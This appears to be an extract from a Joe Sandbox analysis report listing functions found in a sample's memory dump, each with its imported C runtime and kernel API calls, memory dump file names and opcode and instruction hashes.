powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCF936
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCF953
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCFBC0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCFC0E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 5ad30e689d58035035cf876542b3713dd153f0ba22340c1bec9f0be17bf80339
Instruction ID: 524bb5be86d97b10c26868afe01ad3f89840e21f31e00ef757730f210473de97
Opcode Fuzzy Hash: 5ad30e689d58035035cf876542b3713dd153f0ba22340c1bec9f0be17bf80339
Instruction Fuzzy Hash: B9E13922D2CACF91E213A73754821F9F390AF6E784F5C9B32EDD8391B5DB2871819550

Function 00007FF735DCFD90 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCFF29
pow.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DCFF40
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD018B
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DD01E4

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 02ebec0a491480fd2057fd44062463bac77995b48daa91f542a9f8e040063f10
Instruction ID: c659a6c881426b1fd6cf8458cccdf040eb7971a5701bc61e0efb5fe216a911e9
Opcode Fuzzy Hash: 02ebec0a491480fd2057fd44062463bac77995b48daa91f542a9f8e040063f10
Instruction Fuzzy Hash: 79E12C23C1DACB55E213A63754822F9F390AFAF7C4F589732ED88351B2EF2975819610

Function 00007FF735DA47C0 Relevance: 6.3, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA47E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA480C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA4831
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA4856
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA487B

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 95c49b99967c6e3d69156b927d6db844ea5eb24aa15948f459adb9f9028cbabf
Instruction ID: 44b82ca264369f2bca4865076923284ca19208caef583c77302c326846b9cd40
Opcode Fuzzy Hash: 95c49b99967c6e3d69156b927d6db844ea5eb24aa15948f459adb9f9028cbabf
Instruction Fuzzy Hash: 98115E21B2B683A1FE9AAF61E4A0335A3A0FF45F44F889435CD0D573A1DF2CA541A370

Function 00007FF735DC6060 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 281COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140 ref: 00007FF735DC64A0

Strings

--------------------------------, xrefs: 00007FF735DC640E
%*s%.*s, xrefs: 00007FF735DC64F1
%.*s, xrefs: 00007FF735DC64CC

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memchr
String ID: %*s%.*s$ %.*s$--------------------------------
API String ID: 3297308162-2326682469
Opcode ID: d17309ed0d59613456a8cf04294e59ee2291ed6a710ef283f0996b4cad43e374
Instruction ID: e58e83e0c7c18bfae491afebbc68ff821aaf46b8f18b3ae3a0a3c07ddd12d7e3
Opcode Fuzzy Hash: d17309ed0d59613456a8cf04294e59ee2291ed6a710ef283f0996b4cad43e374
Instruction Fuzzy Hash: B0E1D232E18AC695E711DB39D0447FCB3A0EF59B88F458332DA9C67295EF38A085D790

Function 00007FF735DD73C0 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

__std_exception_destroy.VCRUNTIME140 ref: 00007FF735DD74D1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD74FD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD762B
__std_exception_copy.VCRUNTIME140 ref: 00007FF735DD766D

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: 1a6c08c575c3cc95ddab942e36961008a2ad0e7c235e8f7b66f902669e15fa4d
Instruction ID: 4f95e039d2d6d285ea011d648f0ff108e2904606f0609e75ede3d000bad56038
Opcode Fuzzy Hash: 1a6c08c575c3cc95ddab942e36961008a2ad0e7c235e8f7b66f902669e15fa4d
Instruction Fuzzy Hash: 58817172A24A86A1EF04EF29E48436CA365FF44F88F908032D74D07A69EF79D8D5D350

Function 00007FF735DB81F0 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB834C
floorf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB8379
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB83A0
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF735DB83C3

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ceilffloorf
String ID:
API String ID: 300201839-0
Opcode ID: 8b4e1d49f591b999ae3730f2a0b2ac739865ba558a8604d369fa8af69be5c933
Instruction ID: e921904a358fd3daf504957f094e5434bf9cc4b8aebcae64d804b3eacd288131
Opcode Fuzzy Hash: 8b4e1d49f591b999ae3730f2a0b2ac739865ba558a8604d369fa8af69be5c933
Instruction Fuzzy Hash: 53516D3392CBC295D3629F3290813B9F7A1BF69781F558332FE8866651EB3DD4918B10

Function 00007FF735DE93C0 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE94C3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE9516
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE9520
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE956C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 6b14a02f9084079f21f4a33f5c18dcfae18d94854c32bffa1e674cbdfab12def
Instruction ID: 207b7a8eb62c0ca5210ecfafe4b831c27d3253c4727c9c95485acffd264eba96
Opcode Fuzzy Hash: 6b14a02f9084079f21f4a33f5c18dcfae18d94854c32bffa1e674cbdfab12def
Instruction Fuzzy Hash: 4841D262B26A43A1ED08EB12D18416DA3A5BB44FE4FD40731DAAE07BD5EE3CE042D314

Function 00007FF735DE9D50 Relevance: 6.1, APIs: 4, Instructions: 120COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9E51
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9E64
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00007FF735DD29C8), ref: 00007FF735DE9ED7
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE9EE4

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: b4e5dcf9bbaa2da0ca61442f2c984441d3c742ad44e5023f288c26c16b7fe9ec
Instruction ID: ed1d1cd69333515c6c16a9049484899888ef8c91c4ca016fa6b379f0cce2e44f
Opcode Fuzzy Hash: b4e5dcf9bbaa2da0ca61442f2c984441d3c742ad44e5023f288c26c16b7fe9ec
Instruction Fuzzy Hash: 1E41C262B26A86A1DE18EB25D4841ADA360FB44FE4F948635DFAE03BD5CF3CD091D310

Function 00007FF735DE7EE0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF735DE7F10
memmove.VCRUNTIME140 ref: 00007FF735DE7FD2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DE8025
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE8032

Part of subcall function 00007FF735DEAF64: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF735DE9935,?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DEAF7E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: b75639982e846283ec09fd2c8f3aad16a82e906a195eb7df05b07a5eadfa8034
Instruction ID: c6ff7df5d5a5fee4487d78cdebcd4b91617989d18027729eba885ad590935217
Opcode Fuzzy Hash: b75639982e846283ec09fd2c8f3aad16a82e906a195eb7df05b07a5eadfa8034
Instruction Fuzzy Hash: 92312862B25683A8FE59BB51E58037992409F00FE4F944131DE2C077C6DE3CE4C2E360

Function 00007FF735DE9580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,00000000,00000004,?,00007FF735DD72FA), ref: 00007FF735DE9662
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000004,?,00007FF735DD72FA), ref: 00007FF735DE96A0
memmove.VCRUNTIME140 ref: 00007FF735DE96AA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE96DF

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 77db6f5e9dab869273bffbdb3067fbaef088ace00bc2dd171ac2ec695c9b60b4
Instruction ID: b8f3f6b737efd36bddf8d94d33978cb4082addfb52eedd558830929d8b4bc950
Opcode Fuzzy Hash: 77db6f5e9dab869273bffbdb3067fbaef088ace00bc2dd171ac2ec695c9b60b4
Instruction Fuzzy Hash: 3B312B6172A78365EE18BB11A58436CE361EB05FD4F940236DE9E0B7D5DE7CD041E310

Function 00007FF735DE9C20 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,00007FF735DD29C8), ref: 00007FF735DE9C8D

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 3b41094913166419721b5d3703f2a1879ec4bc7bfded373dbb1bebc4dcf74de4
Instruction ID: 321bb6c571ce87c4dff8d2aebb494691333a6c9de69f2811d59dbf59f1578fc6
Opcode Fuzzy Hash: 3b41094913166419721b5d3703f2a1879ec4bc7bfded373dbb1bebc4dcf74de4
Instruction Fuzzy Hash: C0310723B1679355FE1ABB65A5803B8A1A09F04FE5FA40231DE6D077D2DE3C94D3A360

Function 00007FF735DE9270 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,00000000,00000004,?,00007FF735DD7251), ref: 00007FF735DE934C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000004,?,00007FF735DD7251), ref: 00007FF735DE9380
memmove.VCRUNTIME140(?,?,00000000,00000004,?,00007FF735DD7251), ref: 00007FF735DE938A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE93B3

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 0da6c697e664dd0c3cd347215f750e3f4412869c381216c1578f5e4f52714d98
Instruction ID: 8ca64b66e12292d1fe75b74a1bb26d099a5267e2936855d150c9ffacac7bf882
Opcode Fuzzy Hash: 0da6c697e664dd0c3cd347215f750e3f4412869c381216c1578f5e4f52714d98
Instruction Fuzzy Hash: EF31C562B2A743A5EE28BB1191842ACE361EB44FD4F944631DEAE077D5DE3CE481D320

Function 00007FF735DE7680 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2701), ref: 00007FF735DE76EA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF735DD2701), ref: 00007FF735DE7770
memmove.VCRUNTIME140(00000000,?,?,00007FF735DD2701), ref: 00007FF735DE7796
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE77BA

Part of subcall function 00007FF735DEAF64: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF735DE9935,?,?,?,?,?,00007FF735DE7EA5), ref: 00007FF735DEAF7E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: 2820beabf59c581c718824bc53ac5742c9041f054aa57f5d0723a468caef3a6d
Instruction ID: d561ced6d56e7677bf73fd82db461ee9d1d671ca9fdefe8e9016597bbe179012
Opcode Fuzzy Hash: 2820beabf59c581c718824bc53ac5742c9041f054aa57f5d0723a468caef3a6d
Instruction Fuzzy Hash: 6B31B422A29783A1ED58BB11A580278A291EF05FF4F944B34DE7D077D0DF7CE4929360

Function 00007FF735DDE9C0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8
memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DDEAB6

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task
String ID:
API String ID: 1247048853-0
Opcode ID: 3a0a1b33bafb837ef3869f84af2ef01071847174f9741cab1fec32c2d88c2b25
Instruction ID: 5d0ab28f8786af58de011523463f9ac90deae6f7dc05753c1e04cae2dd7582b6
Opcode Fuzzy Hash: 3a0a1b33bafb837ef3869f84af2ef01071847174f9741cab1fec32c2d88c2b25
Instruction Fuzzy Hash: 7E21C763A19743A9EE15FB51A580378B290EF04FE4F985630DE6D077D2DE3CA492A310

Function 00007FF735DEBA20 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF735DEBA69
GetLastError.KERNEL32 ref: 00007FF735DEBA77
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF735DE8BD4), ref: 00007FF735DEBAAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF735DE8BD4), ref: 00007FF735DEBABA

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 06307606f78a99aaedfa9dc91252f3d2ccca91acf1828ac2f8e73b894af3cb05
Instruction ID: ecff2294ea9b3ae1233a224b42f2f6fa9a4a1e2b79dae31cf255a08bb2058fd2
Opcode Fuzzy Hash: 06307606f78a99aaedfa9dc91252f3d2ccca91acf1828ac2f8e73b894af3cb05
Instruction Fuzzy Hash: 53215172A29B8687E714DF11E48432EB6B4FB98F84F644138DB8957B58DF3DD8418B10

Function 00007FF735DB2130 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF735DB1F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DB1F99

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DB216B
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DB217D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DB2185
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DB21ED

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
